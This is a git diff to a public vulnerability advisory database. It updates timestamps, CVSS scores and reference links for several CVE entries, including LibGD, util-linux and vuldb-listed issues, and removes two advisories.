b/advisories/unreviewed/2022/05/GHSA-26x8-wc99-6x99/GHSA-26x8-wc99-6x99.json index 1aafcab319e..dbf4d63961b 100644 --- a/advisories/unreviewed/2022/05/GHSA-26x8-wc99-6x99/GHSA-26x8-wc99-6x99.json +++ b/advisories/unreviewed/2022/05/GHSA-26x8-wc99-6x99/GHSA-26x8-wc99-6x99.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-26x8-wc99-6x99", - "modified": "2022-05-24T19:09:53Z", + "modified": "2024-04-07T03:30:46Z", "published": "2022-05-24T19:09:53Z", "aliases": [ "CVE-2021-38115" ], "details": "read_header_tga in gd_tga.c in the GD Graphics Library (aka LibGD) through 2.3.2 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted TGA file.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -25,6 +28,10 @@ { "type": "WEB", "url": "https://github.com/libgd/libgd/pull/711/commits/8b111b2b4a4842179be66db68d84dda91a246032" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00003.html" } ], "database_specific": { diff --git a/advisories/unreviewed/2022/05/GHSA-3jhw-vwp2-45mp/GHSA-3jhw-vwp2-45mp.json b/advisories/unreviewed/2022/05/GHSA-3jhw-vwp2-45mp/GHSA-3jhw-vwp2-45mp.json index f5666da7345..44793157e78 100644 --- a/advisories/unreviewed/2022/05/GHSA-3jhw-vwp2-45mp/GHSA-3jhw-vwp2-45mp.json +++ b/advisories/unreviewed/2022/05/GHSA-3jhw-vwp2-45mp/GHSA-3jhw-vwp2-45mp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3jhw-vwp2-45mp", - "modified": "2024-03-21T03:34:05Z", + "modified": "2024-04-07T12:31:03Z", "published": "2022-05-24T19:09:19Z", "aliases": [ "CVE-2021-37600" @@ -29,6 +29,10 @@ "type": "WEB", "url": "https://github.com/karelzak/util-linux/commit/1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00005.html" + }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202401-08" diff --git a/advisories/unreviewed/2022/05/GHSA-53w9-wg73-ghrw/GHSA-53w9-wg73-ghrw.json b/advisories/unreviewed/2022/05/GHSA-53w9-wg73-ghrw/GHSA-53w9-wg73-ghrw.json index 0540ec66d29..cab924a7acd 100644 --- a/advisories/unreviewed/2022/05/GHSA-53w9-wg73-ghrw/GHSA-53w9-wg73-ghrw.json +++ b/advisories/unreviewed/2022/05/GHSA-53w9-wg73-ghrw/GHSA-53w9-wg73-ghrw.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-53w9-wg73-ghrw", - "modified": "2022-05-24T19:13:18Z", + "modified": "2024-04-07T03:30:46Z", "published": "2022-05-24T19:13:18Z", "aliases": [ "CVE-2021-40812" ], "details": "The GD Graphics Library (aka LibGD) through 2.3.2 has an out-of-bounds read because of the lack of certain gdGetBuf and gdPutBuf return value checks.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -25,6 +28,10 @@ { "type": "WEB", "url": "https://github.com/libgd/libgd/commit/6f5136821be86e7068fcdf651ae9420b5d42e9a9" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00003.html" } ], "database_specific": { diff --git a/advisories/unreviewed/2022/05/GHSA-5xv2-q475-rwrh/GHSA-5xv2-q475-rwrh.json b/advisories/unreviewed/2022/05/GHSA-5xv2-q475-rwrh/GHSA-5xv2-q475-rwrh.json deleted file mode 100644 index 51ec6a2318b..00000000000 --- a/advisories/unreviewed/2022/05/GHSA-5xv2-q475-rwrh/GHSA-5xv2-q475-rwrh.json +++ /dev/null @@ -1,58 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-5xv2-q475-rwrh", - "modified": "2024-02-13T18:38:21Z", - "published": "2022-05-17T05:13:13Z", - "aliases": [ - "CVE-2012-3503" - ], - "details": "The installation script in Katello 1.0 and earlier does not properly generate the Application.config.secret_token value, which causes each default installation to have the same secret token, and allows remote attackers to authenticate to the CloudForms System Engine web interface as an arbitrary user by creating a cookie using the default secret_token.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-3503" - }, - { - "type": "WEB", - "url": "https://github.com/Katello/katello/pull/499" - }, - { - "type": "WEB", - "url": "https://github.com/Katello/katello/commit/7c256fef9d75029d0ffff58ff1dcda915056d3a3" - }, - { - "type": "WEB", - "url": "http://rhn.redhat.com/errata/RHSA-2012-1186.html" - }, - { - "type": "WEB", - "url": "http://rhn.redhat.com/errata/RHSA-2012-1187.html" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/50344" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/55140" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-798" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2012-08-25T10:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-6mmf-v5q7-vw2w/GHSA-6mmf-v5q7-vw2w.json b/advisories/unreviewed/2022/05/GHSA-6mmf-v5q7-vw2w/GHSA-6mmf-v5q7-vw2w.json deleted file mode 100644 index 8cb8ccec214..00000000000 --- a/advisories/unreviewed/2022/05/GHSA-6mmf-v5q7-vw2w/GHSA-6mmf-v5q7-vw2w.json +++ /dev/null @@ -1,35 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-6mmf-v5q7-vw2w", - "modified": "2022-05-24T19:21:10Z", - "published": "2022-05-24T19:21:10Z", - "aliases": [ - "CVE-2021-44144" - ], - "details": "Croatia Control Asterix 2.8.1 has a heap-based buffer over-read, with additional details to be disclosed at a later date.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44144" - }, - { - "type": "WEB", - "url": "https://github.com/CroatiaControlLtd/asterix/issues/183" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-125" - ], - "severity": "CRITICAL", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2021-11-22T21:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-hg8v-gh24-gpf4/GHSA-hg8v-gh24-gpf4.json b/advisories/unreviewed/2022/05/GHSA-hg8v-gh24-gpf4/GHSA-hg8v-gh24-gpf4.json index b9091e7b030..a2013cd1871 100644 --- a/advisories/unreviewed/2022/05/GHSA-hg8v-gh24-gpf4/GHSA-hg8v-gh24-gpf4.json +++ b/advisories/unreviewed/2022/05/GHSA-hg8v-gh24-gpf4/GHSA-hg8v-gh24-gpf4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hg8v-gh24-gpf4", - "modified": "2022-05-24T19:03:33Z", + "modified": "2024-04-07T12:31:03Z", "published": "2022-05-24T19:03:33Z", "aliases": [ "CVE-2021-30498" @@ -29,6 +29,10 @@ "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1948675" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00004.html" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6WFGYICNTMNDNMDDUV4G2RYFB5HNJCOV" diff --git a/advisories/unreviewed/2022/05/GHSA-jw3x-9g83-4hvr/GHSA-jw3x-9g83-4hvr.json b/advisories/unreviewed/2022/05/GHSA-jw3x-9g83-4hvr/GHSA-jw3x-9g83-4hvr.json index ffbd0a047cd..e974be387d3 100644 --- a/advisories/unreviewed/2022/05/GHSA-jw3x-9g83-4hvr/GHSA-jw3x-9g83-4hvr.json +++ b/advisories/unreviewed/2022/05/GHSA-jw3x-9g83-4hvr/GHSA-jw3x-9g83-4hvr.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jw3x-9g83-4hvr", - "modified": "2022-05-24T17:08:23Z", + "modified": "2024-04-07T03:30:46Z", "published": "2022-05-24T17:08:23Z", "aliases": [ "CVE-2018-14553" ], "details": "gdImageClone in gd.c in libgd 2.1.0-rc2 through 2.2.5 has a NULL pointer dereference allowing atteckers to crash an application via a specific function call sequence.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -38,6 +41,14 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00014.html" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00003.html" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3CZ2QADQTKRHTGB2AHD7J4QQNDLBEMM6" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3CZ2QADQTKRHTGB2AHD7J4QQNDLBEMM6" diff --git a/advisories/unreviewed/2022/05/GHSA-wp9w-2vp9-wg66/GHSA-wp9w-2vp9-wg66.json b/advisories/unreviewed/2022/05/GHSA-wp9w-2vp9-wg66/GHSA-wp9w-2vp9-wg66.json index d7b858c0ca8..0096c6ae760 100644 --- a/advisories/unreviewed/2022/05/GHSA-wp9w-2vp9-wg66/GHSA-wp9w-2vp9-wg66.json +++ b/advisories/unreviewed/2022/05/GHSA-wp9w-2vp9-wg66/GHSA-wp9w-2vp9-wg66.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wp9w-2vp9-wg66", - "modified": "2023-04-26T21:30:35Z", + "modified": "2024-04-09T00:30:40Z", "published": "2022-05-24T17:19:31Z", "aliases": [ "CVE-2020-12695" @@ -23,55 +23,7 @@ }, { "type": "WEB", - "url": "https://corelight.blog/2020/06/10/detecting-the-new-callstranger-upnp-vulnerability-with-zeek" - }, - { - "type": "WEB", - "url": "https://github.com/corelight/callstranger-detector" - }, - { - "type": "WEB", - "url": "https://github.com/yunuscadirci/CallStranger" - }, - { - "type": "WEB", - "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00011.html" - }, - { - "type": "WEB", - "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00013.html" - }, - { - "type": "WEB", - "url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00017.html" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L3SHL4LOFGHJ3DIXSUIQELGVBDJ7V7LB" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MZDWHKGN3LMGSUEOAAVAMOD3IUIPJVOJ" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQEYVY4D7LASH6AI4WK3IK2QBFHHF3Q2" - }, - { - "type": "WEB", - "url": "https://usn.ubuntu.com/4494-1" - }, - { - "type": "WEB", - "url": "https://www.callstranger.com" - }, - { - "type": "WEB", - "url": "https://www.debian.org/security/2020/dsa-4806" - }, - { - "type": "WEB", - "url": "https://www.debian.org/security/2021/dsa-4898" + "url": "https://www.tenable.com/blog/cve-2020-12695-callstranger-vulnerability-in-universal-plug-and-play-upnp-puts-billions-of" }, { "type": "WEB", @@ -79,7 +31,67 @@ }, { "type": "WEB", - "url": "https://www.tenable.com/blog/cve-2020-12695-callstranger-vulnerability-in-universal-plug-and-play-upnp-puts-billions-of" + "url": "https://www.debian.org/security/2021/dsa-4898" + }, + { + "type": "WEB", + "url": "https://www.debian.org/security/2020/dsa-4806" + }, + { + "type": "WEB", + "url": "https://www.callstranger.com" + }, + { + "type": "WEB", + "url": "https://usn.ubuntu.com/4494-1" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQEYVY4D7LASH6AI4WK3IK2QBFHHF3Q2" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MZDWHKGN3LMGSUEOAAVAMOD3IUIPJVOJ" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L3SHL4LOFGHJ3DIXSUIQELGVBDJ7V7LB" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RQEYVY4D7LASH6AI4WK3IK2QBFHHF3Q2" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MZDWHKGN3LMGSUEOAAVAMOD3IUIPJVOJ" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L3SHL4LOFGHJ3DIXSUIQELGVBDJ7V7LB" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00017.html" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00013.html" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00011.html" + }, + { + "type": "WEB", + "url": "https://github.com/yunuscadirci/CallStranger" + }, + { + "type": "WEB", + "url": "https://github.com/corelight/callstranger-detector" + }, + { + "type": "WEB", + "url": "https://corelight.blog/2020/06/10/detecting-the-new-callstranger-upnp-vulnerability-with-zeek" }, { "type": "WEB", diff --git a/advisories/unreviewed/2023/01/GHSA-3mf9-jjrh-xqv8/GHSA-3mf9-jjrh-xqv8.json b/advisories/unreviewed/2023/01/GHSA-3mf9-jjrh-xqv8/GHSA-3mf9-jjrh-xqv8.json index 45c11aadd0b..64ad42c5f24 100644 --- a/advisories/unreviewed/2023/01/GHSA-3mf9-jjrh-xqv8/GHSA-3mf9-jjrh-xqv8.json +++ b/advisories/unreviewed/2023/01/GHSA-3mf9-jjrh-xqv8/GHSA-3mf9-jjrh-xqv8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3mf9-jjrh-xqv8", - "modified": "2023-01-13T21:30:26Z", + "modified": "2024-04-09T09:31:07Z", "published": "2023-01-10T12:30:23Z", "aliases": [ "CVE-2022-43513" @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-43513" }, + { + "type": "WEB", + "url": "https://cert-portal.siemens.com/productcert/html/ssa-476715.html" + }, + { + "type": "WEB", + "url": "https://cert-portal.siemens.com/productcert/html/ssa-556635.html" + }, { "type": "WEB", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-476715.pdf" diff --git a/advisories/unreviewed/2023/01/GHSA-9pw2-prwg-r2jf/GHSA-9pw2-prwg-r2jf.json b/advisories/unreviewed/2023/01/GHSA-9pw2-prwg-r2jf/GHSA-9pw2-prwg-r2jf.json index 21d99f86531..a3c6ee5e1c4 100644 --- a/advisories/unreviewed/2023/01/GHSA-9pw2-prwg-r2jf/GHSA-9pw2-prwg-r2jf.json +++ b/advisories/unreviewed/2023/01/GHSA-9pw2-prwg-r2jf/GHSA-9pw2-prwg-r2jf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9pw2-prwg-r2jf", - "modified": "2023-01-14T03:30:22Z", + "modified": "2024-04-09T09:31:07Z", "published": "2023-01-10T12:30:23Z", "aliases": [ "CVE-2022-43514" @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-43514" }, + { + "type": "WEB", + "url": "https://cert-portal.siemens.com/productcert/html/ssa-476715.html" + }, + { + "type": "WEB", + "url": "https://cert-portal.siemens.com/productcert/html/ssa-556635.html" + }, { "type": "WEB", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-476715.pdf" diff --git a/advisories/unreviewed/2023/06/GHSA-h83r-hgff-qm4q/GHSA-h83r-hgff-qm4q.json b/advisories/unreviewed/2023/06/GHSA-h83r-hgff-qm4q/GHSA-h83r-hgff-qm4q.json index 5d265f8d05a..7c89a501c7c 100644 --- a/advisories/unreviewed/2023/06/GHSA-h83r-hgff-qm4q/GHSA-h83r-hgff-qm4q.json +++ b/advisories/unreviewed/2023/06/GHSA-h83r-hgff-qm4q/GHSA-h83r-hgff-qm4q.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-h83r-hgff-qm4q", - "modified": "2023-11-15T00:31:06Z", + "modified": "2024-04-10T15:30:31Z", "published": "2023-06-26T18:30:27Z", "aliases": [ "CVE-2023-33580" @@ -25,6 +25,10 @@ "type": "WEB", "url": "https://github.com/sudovivek/CVE/blob/main/CVE-2023-33580/CVE-2023-33580.txt" }, + { + "type": "WEB", + "url": "https://github.com/sudovivek/My-CVE/blob/main/CVE-2023-33580_exploit.md" + }, { "type": "WEB", "url": "https://phpgurukul.com/student-study-center-management-system-using-php-and-mysql" diff --git a/advisories/unreviewed/2023/08/GHSA-45qq-m2cx-4ggc/GHSA-45qq-m2cx-4ggc.json b/advisories/unreviewed/2023/08/GHSA-45qq-m2cx-4ggc/GHSA-45qq-m2cx-4ggc.json index 3391c3ad3ed..abcf404e566 100644 --- a/advisories/unreviewed/2023/08/GHSA-45qq-m2cx-4ggc/GHSA-45qq-m2cx-4ggc.json +++ b/advisories/unreviewed/2023/08/GHSA-45qq-m2cx-4ggc/GHSA-45qq-m2cx-4ggc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-45qq-m2cx-4ggc", - "modified": "2023-08-18T18:30:35Z", + "modified": "2024-04-09T09:31:07Z", "published": "2023-08-18T18:30:35Z", "aliases": [ "CVE-2023-4414" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.237517" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.191743" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/08/GHSA-6wxp-8624-h2hh/GHSA-6wxp-8624-h2hh.json b/advisories/unreviewed/2023/08/GHSA-6wxp-8624-h2hh/GHSA-6wxp-8624-h2hh.json index cab55ab3a93..f16d559805b 100644 --- a/advisories/unreviewed/2023/08/GHSA-6wxp-8624-h2hh/GHSA-6wxp-8624-h2hh.json +++ b/advisories/unreviewed/2023/08/GHSA-6wxp-8624-h2hh/GHSA-6wxp-8624-h2hh.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6wxp-8624-h2hh", - "modified": "2023-08-03T12:31:51Z", + "modified": "2024-04-09T09:31:07Z", "published": "2023-08-03T12:31:51Z", "aliases": [ "CVE-2023-4121" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.235968" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.185755" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/08/GHSA-hhfj-vm6r-5prv/GHSA-hhfj-vm6r-5prv.json b/advisories/unreviewed/2023/08/GHSA-hhfj-vm6r-5prv/GHSA-hhfj-vm6r-5prv.json index 6e7fbaa7cc7..4ded1ca9c92 100644 --- a/advisories/unreviewed/2023/08/GHSA-hhfj-vm6r-5prv/GHSA-hhfj-vm6r-5prv.json +++ b/advisories/unreviewed/2023/08/GHSA-hhfj-vm6r-5prv/GHSA-hhfj-vm6r-5prv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hhfj-vm6r-5prv", - "modified": "2023-08-26T09:30:17Z", + "modified": "2024-04-09T09:31:08Z", "published": "2023-08-26T09:30:17Z", "aliases": [ "CVE-2023-4546" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.238057" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.195836" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/08/GHSA-jvmm-xwpf-wmm2/GHSA-jvmm-xwpf-wmm2.json b/advisories/unreviewed/2023/08/GHSA-jvmm-xwpf-wmm2/GHSA-jvmm-xwpf-wmm2.json index 5922abafb15..44618fa7286 100644 --- a/advisories/unreviewed/2023/08/GHSA-jvmm-xwpf-wmm2/GHSA-jvmm-xwpf-wmm2.json +++ b/advisories/unreviewed/2023/08/GHSA-jvmm-xwpf-wmm2/GHSA-jvmm-xwpf-wmm2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jvmm-xwpf-wmm2", - "modified": "2023-08-03T09:30:16Z", + "modified": "2024-04-09T09:31:07Z", "published": "2023-08-03T09:30:16Z", "aliases": [ "CVE-2023-4120" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.235967" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.185751" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/08/GHSA-mh56-636p-hcp5/GHSA-mh56-636p-hcp5.json b/advisories/unreviewed/2023/08/GHSA-mh56-636p-hcp5/GHSA-mh56-636p-hcp5.json index 68d175d1e58..d66ea4eb32a 100644 --- a/advisories/unreviewed/2023/08/GHSA-mh56-636p-hcp5/GHSA-mh56-636p-hcp5.json +++ b/advisories/unreviewed/2023/08/GHSA-mh56-636p-hcp5/GHSA-mh56-636p-hcp5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mh56-636p-hcp5", - "modified": "2023-08-26T06:30:22Z", + "modified": "2024-04-09T09:31:08Z", "published": "2023-08-26T06:30:22Z", "aliases": [ "CVE-2023-4544" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.238049" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.193047" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/09/GHSA-3pj2-53jv-g287/GHSA-3pj2-53jv-g287.json b/advisories/unreviewed/2023/09/GHSA-3pj2-53jv-g287/GHSA-3pj2-53jv-g287.json index d0a53d1f42f..6fa1549631c 100644 --- a/advisories/unreviewed/2023/09/GHSA-3pj2-53jv-g287/GHSA-3pj2-53jv-g287.json +++ b/advisories/unreviewed/2023/09/GHSA-3pj2-53jv-g287/GHSA-3pj2-53jv-g287.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3pj2-53jv-g287", - "modified": "2023-09-03T21:30:24Z", + "modified": "2024-04-09T09:31:08Z", "published": "2023-09-03T21:30:24Z", "aliases": [ "CVE-2023-4739" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.238628" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.197572" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/09/GHSA-m758-wc7v-8xpg/GHSA-m758-wc7v-8xpg.json b/advisories/unreviewed/2023/09/GHSA-m758-wc7v-8xpg/GHSA-m758-wc7v-8xpg.json index 332cea0caa0..f632fd57936 100644 --- a/advisories/unreviewed/2023/09/GHSA-m758-wc7v-8xpg/GHSA-m758-wc7v-8xpg.json +++ b/advisories/unreviewed/2023/09/GHSA-m758-wc7v-8xpg/GHSA-m758-wc7v-8xpg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m758-wc7v-8xpg", - "modified": "2023-09-04T00:30:14Z", + "modified": "2024-04-09T09:31:08Z", "published": "2023-09-04T00:30:14Z", "aliases": [ "CVE-2023-4745" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.238634" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.198222" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/09/GHSA-qmrr-rfcw-67r3/GHSA-qmrr-rfcw-67r3.json b/advisories/unreviewed/2023/09/GHSA-qmrr-rfcw-67r3/GHSA-qmrr-rfcw-67r3.json index cfd48aa0156..20e62793767 100644 --- a/advisories/unreviewed/2023/09/GHSA-qmrr-rfcw-67r3/GHSA-qmrr-rfcw-67r3.json +++ b/advisories/unreviewed/2023/09/GHSA-qmrr-rfcw-67r3/GHSA-qmrr-rfcw-67r3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qmrr-rfcw-67r3", - "modified": "2023-09-10T03:30:12Z", + "modified": "2024-04-09T09:31:08Z", "published": "2023-09-10T03:30:12Z", "aliases": [ "CVE-2023-4873" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.239358" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.204279" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/10/GHSA-229m-w66g-mjph/GHSA-229m-w66g-mjph.json b/advisories/unreviewed/2023/10/GHSA-229m-w66g-mjph/GHSA-229m-w66g-mjph.json index 0a0f04c4426..ebc3aad3dc7 100644 --- a/advisories/unreviewed/2023/10/GHSA-229m-w66g-mjph/GHSA-229m-w66g-mjph.json +++ b/advisories/unreviewed/2023/10/GHSA-229m-w66g-mjph/GHSA-229m-w66g-mjph.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-229m-w66g-mjph", - "modified": "2023-10-21T09:30:25Z", + "modified": "2024-04-09T09:31:09Z", "published": "2023-10-21T09:30:25Z", "aliases": [ "CVE-2023-5684" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.243061" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.219836" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/10/GHSA-4rfc-h5jw-xx8j/GHSA-4rfc-h5jw-xx8j.json b/advisories/unreviewed/2023/10/GHSA-4rfc-h5jw-xx8j/GHSA-4rfc-h5jw-xx8j.json index c4efc146b9c..c7d39ccfb55 100644 --- a/advisories/unreviewed/2023/10/GHSA-4rfc-h5jw-xx8j/GHSA-4rfc-h5jw-xx8j.json +++ b/advisories/unreviewed/2023/10/GHSA-4rfc-h5jw-xx8j/GHSA-4rfc-h5jw-xx8j.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4rfc-h5jw-xx8j", - "modified": "2023-10-10T18:31:31Z", + "modified": "2024-04-09T09:31:08Z", "published": "2023-10-10T18:31:31Z", "aliases": [ "CVE-2023-5492" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.241644" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.213949" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/10/GHSA-9g9q-7j6v-8cmj/GHSA-9g9q-7j6v-8cmj.json b/advisories/unreviewed/2023/10/GHSA-9g9q-7j6v-8cmj/GHSA-9g9q-7j6v-8cmj.json index 83747f3563f..718fd85bb5b 100644 --- a/advisories/unreviewed/2023/10/GHSA-9g9q-7j6v-8cmj/GHSA-9g9q-7j6v-8cmj.json +++ b/advisories/unreviewed/2023/10/GHSA-9g9q-7j6v-8cmj/GHSA-9g9q-7j6v-8cmj.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9g9q-7j6v-8cmj", - "modified": "2023-10-10T15:30:51Z", + "modified": "2024-04-09T09:31:08Z", "published": "2023-10-10T15:30:51Z", "aliases": [ "CVE-2023-5488" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.241640" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.213945" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/10/GHSA-9gpg-73x5-68cm/GHSA-9gpg-73x5-68cm.json b/advisories/unreviewed/2023/10/GHSA-9gpg-73x5-68cm/GHSA-9gpg-73x5-68cm.json index 76a1de42f81..bf20ed6be91 100644 --- a/advisories/unreviewed/2023/10/GHSA-9gpg-73x5-68cm/GHSA-9gpg-73x5-68cm.json +++ b/advisories/unreviewed/2023/10/GHSA-9gpg-73x5-68cm/GHSA-9gpg-73x5-68cm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9gpg-73x5-68cm", - "modified": "2023-10-10T18:31:31Z", + "modified": "2024-04-09T09:31:08Z", "published": "2023-10-10T18:31:31Z", "aliases": [ "CVE-2023-5494" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.241646" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.215382" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/10/GHSA-cq5q-x34f-p7m4/GHSA-cq5q-x34f-p7m4.json b/advisories/unreviewed/2023/10/GHSA-cq5q-x34f-p7m4/GHSA-cq5q-x34f-p7m4.json index 1797cc99ccc..4e3d16a21a1 100644 --- a/advisories/unreviewed/2023/10/GHSA-cq5q-x34f-p7m4/GHSA-cq5q-x34f-p7m4.json +++ b/advisories/unreviewed/2023/10/GHSA-cq5q-x34f-p7m4/GHSA-cq5q-x34f-p7m4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cq5q-x34f-p7m4", - "modified": "2023-10-10T18:31:31Z", + "modified": "2024-04-09T09:31:08Z", "published": "2023-10-10T18:31:31Z", "aliases": [ "CVE-2023-5493" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.241645" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.213951" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/10/GHSA-mg88-vr9f-rg8p/GHSA-mg88-vr9f-rg8p.json 